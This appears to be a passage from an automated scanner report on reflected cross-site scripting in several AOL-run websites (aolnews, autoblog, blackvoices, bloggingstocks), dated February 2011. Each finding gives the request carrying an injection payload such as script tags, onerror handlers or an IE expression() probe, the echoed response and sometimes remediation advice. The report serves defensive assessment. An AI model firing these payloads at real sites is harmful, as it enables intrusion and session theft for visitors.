HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:17 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999989
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 69200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
";
s_265.linkInternalFilters="javascript:,aolnews.com";
s_265.mmxgo = true;
s_265.prop1="story";
s_265.prop2="article";
s_265.prop12="http://www.aolnews.com/story/egypt-regime-offers-new-concessions-toe7180";d6f4da479f4/1550027";
s_265.prop23="AP";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.237. http://www.aolnews.com/story/the-rise-and-fall-of-a-foreclosure-king/1567480 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.aolnews.com
Path:   /story/the-rise-and-fall-of-a-foreclosure-king/1567480

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aba1d"%3bf4c36a25637 was submitted in the REST URL parameter 2. This input was echoed as aba1d";f4c36a25637 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /story/the-rise-and-fall-of-a-foreclosure-kingaba1d"%3bf4c36a25637/1567480 HTTP/1.1
Host: www.aolnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:06 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999869
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 71809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
;
s_265.linkInternalFilters="javascript:,aolnews.com";
s_265.mmxgo = true;
s_265.prop1="story";
s_265.prop2="article";
s_265.prop12="http://www.aolnews.com/story/the-rise-and-fall-of-a-foreclosure-kingaba1d";f4c36a25637/1567480";
s_265.prop23="AP";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.238. http://www.aolnews.com/story/the-rise-and-fall-of-a-foreclosure-king/1567480 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aolnews.com
Path:   /story/the-rise-and-fall-of-a-foreclosure-king/1567480

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c010a"><img%20src%3da%20onerror%3dalert(1)>4971c98bf8c was submitted in the REST URL parameter 2. This input was echoed as c010a"><img src=a onerror=alert(1)>4971c98bf8c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /story/the-rise-and-fall-of-a-foreclosure-kingc010a"><img%20src%3da%20onerror%3dalert(1)>4971c98bf8c/1567480 HTTP/1.1
Host: www.aolnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:06 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999989
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 72020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
<meta property="og:url" content="http://www.aolnews.com/story/the-rise-and-fall-of-a-foreclosure-kingc010a"><img src=a onerror=alert(1)>4971c98bf8c/1567480" />
...[SNIP]...

1.239. http://www.autoblog.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autoblog.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcaf5"><script>alert(1)</script>04f9219082 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?fcaf5"><script>alert(1)</script>04f9219082=1 HTTP/1.1
Host: www.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:01 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Keep-Alive: timeout=5, max=999993
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 104531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.autoblog.com/?fcaf5"><script>alert(1)</script>04f9219082=1"/>
...[SNIP]...

1.240. http://www.autoblog.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autoblog.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6c46"-alert(1)-"8a56f02ab0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?b6c46"-alert(1)-"8a56f02ab0f=1 HTTP/1.1
Host: www.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:01 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 104460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
5.channel="wb.autoblog";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,autoblog.com";
s_265.mmxgo = true;
s_265.prop1="Autoblog";
s_265.prop2="Home";
s_265.prop12="http://www.autoblog.com/?b6c46"-alert(1)-"8a56f02ab0f=1";
s_265.prop16="Autoblog &mdash; We Obsessively Cover The Auto Industry";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="dtc";
s_265.prop22="8";
s_265.prop23="";


...[SNIP]...

1.241. http://www.autoblog.com/2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autoblog.com
Path:   /2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df24d"><img%20src%3da%20onerror%3dalert(1)>1e853498656 was submitted in the REST URL parameter 3. This input was echoed as df24d"><img src=a onerror=alert(1)>1e853498656 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /2011/02/06df24d"><img%20src%3da%20onerror%3dalert(1)>1e853498656/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/ HTTP/1.1
Host: www.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:17:46 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:17:49 GMT; path=/
Keep-Alive: timeout=5, max=1000000
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 117703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="referer" value="http://www.autoblog.com:1080/2011/02/06df24d"><img src=a onerror=alert(1)>1e853498656/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/">
...[SNIP]...

1.242. http://www.autoblog.com/2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autoblog.com
Path:   /2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65d60"><script>alert(1)</script>1b28de94597 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/?65d60"><script>alert(1)</script>1b28de94597=1 HTTP/1.1
Host: www.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:16 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:16:18 GMT; path=/
Keep-Alive: timeout=5, max=1000000
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 117773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.autoblog.com/2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/?65d60"><script>alert(1)</script>1b28de94597=1"/>
...[SNIP]...

1.243. http://www.autoblog.com/2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autoblog.com
Path:   /2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ed8f"-alert(1)-"d7b205f65a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/?2ed8f"-alert(1)-"d7b205f65a=1 HTTP/1.1
Host: www.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:30 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:16:32 GMT; path=/
Keep-Alive: timeout=5, max=999998
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 118067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
ascript:,autoblog.com";
s_265.mmxgo = true;
s_265.prop1="Autoblog";
s_265.prop2="Post";
s_265.prop12="http://www.autoblog.com/2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/?2ed8f"-alert(1)-"d7b205f65a=1";
s_265.prop16="Chevy Camaro platform underpins new GM vehicle in Chicago &mdash; Autoblog";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="dtc";
s_265.prop22="8";
...[SNIP]...

1.244. http://www.autoblog.com/2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.autoblog.com
Path:   /2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc04"><a>1436766e6d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /2011/02/06acc04"><a>1436766e6d8/mahindra-tr40-pickup-only-good-for-19-21-mpg/ HTTP/1.1
Host: www.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:17:35 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:17:38 GMT; path=/
Keep-Alive: timeout=5, max=999994
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 118236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.autoblog.com/2011/02/06acc04"><a>1436766e6d8/mahindra-tr40-pickup-only-good-for-19-21-mpg/"/>
...[SNIP]...

1.245. http://www.autoblog.com/2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autoblog.com
Path:   /2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d613"-alert(1)-"fe97bb80e97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/?5d613"-alert(1)-"fe97bb80e97=1 HTTP/1.1
Host: www.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:30 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:16:33 GMT; path=/
Keep-Alive: timeout=5, max=999994
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 118757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
ternalFilters="javascript:,autoblog.com";
s_265.mmxgo = true;
s_265.prop1="Autoblog";
s_265.prop2="Post";
s_265.prop12="http://www.autoblog.com/2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/?5d613"-alert(1)-"fe97bb80e97=1";
s_265.prop16="Mahindra TR40 pickup only good for 19/21 mpg? &mdash; Autoblog";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="dtc";
s_265.prop22="8";
s_265.prop2
...[SNIP]...

1.246. http://www.autoblog.com/2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autoblog.com
Path:   /2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3db4"><script>alert(1)</script>c2ac64e6519 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/?b3db4"><script>alert(1)</script>c2ac64e6519=1 HTTP/1.1
Host: www.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:16 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:16:18 GMT; path=/
Keep-Alive: timeout=5, max=999985
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 118348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.autoblog.com/2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/?b3db4"><script>alert(1)</script>c2ac64e6519=1"/>
...[SNIP]...

1.247. http://www.autoblog.com/2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autoblog.com
Path:   /2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7b24"><x%20style%3dx%3aexpression(alert(1))>ee21d362895 was submitted in the REST URL parameter 3. This input was echoed as f7b24"><x style=x:expression(alert(1))>ee21d362895 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /2011/02/06f7b24"><x%20style%3dx%3aexpression(alert(1))>ee21d362895/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/ HTTP/1.1
Host: www.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:17:46 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:17:47 GMT; path=/
Keep-Alive: timeout=5, max=999987
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 97078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="referer" value="http://www.autoblog.com:1080/2011/02/06f7b24"><x style=x:expression(alert(1))>ee21d362895/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/">
...[SNIP]...

1.248. http://www.autoblog.com/2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autoblog.com
Path:   /2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44a06"-alert(1)-"c678d512fbe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/?44a06"-alert(1)-"c678d512fbe=1 HTTP/1.1
Host: www.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:30 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:16:32 GMT; path=/
Keep-Alive: timeout=5, max=999997
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 97405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
lters="javascript:,autoblog.com";
s_265.mmxgo = true;
s_265.prop1="Autoblog";
s_265.prop2="Post";
s_265.prop12="http://www.autoblog.com/2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/?44a06"-alert(1)-"c678d512fbe=1";
s_265.prop16="Williams FW33 Formula 1 car unveiled, IPO confirmed &mdash; Autoblog";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="dtc";
s_265.prop22="8";
s_265
...[SNIP]...

1.249. http://www.autoblog.com/2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autoblog.com
Path:   /2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b9ee"><script>alert(1)</script>325abb71f59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/?5b9ee"><script>alert(1)</script>325abb71f59=1 HTTP/1.1
Host: www.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:16 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:16:18 GMT; path=/
Keep-Alive: timeout=5, max=999996
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 96996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.autoblog.com/2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/?5b9ee"><script>alert(1)</script>325abb71f59=1"/>
...[SNIP]...

1.250. http://www.blackvoices.com/life-style/black-travel [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /life-style/black-travel

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 200d9"-alert(1)-"24b08b883ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /life-style200d9"-alert(1)-"24b08b883ad/black-travel HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3240378380.1628589389.2600273152; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:16:07 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 30969
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm04 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<!--
s_265.mmxgo=true;
s_265.pageName="Page Not Found";
s_265.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="life-style200d9"-alert(1)-"24b08b883ad";
s_265.prop2="black-travel";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/life-style200d9\"-alert(1)-\"24b08b883ad/black-travel";
s_265.linkInternalFilters="
...[SNIP]...

1.251. http://www.blackvoices.com/life-style/black-travel [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /life-style/black-travel

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0d24"-alert(1)-"b7bf6e6c1a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /life-style/black-travelb0d24"-alert(1)-"b7bf6e6c1a HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2334772668.1997950285.3749250816; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:16:11 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 30965
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld29 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<!--
s_265.mmxgo=true;
s_265.pageName="Page Not Found";
s_265.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="life-style";
s_265.prop2="black-travelb0d24"-alert(1)-"b7bf6e6c1a";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/life-style/black-travelb0d24\"-alert(1)-\"b7bf6e6c1a";
s_265.linkInternalFilters="javascript:,aol.com,blackvoic
...[SNIP]...

1.252. http://www.bloggingstocks.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bloggingstocks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f020e"-alert(1)-"014356e96ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?f020e"-alert(1)-"014356e96ab=1 HTTP/1.1
Host: www.bloggingstocks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:06 GMT
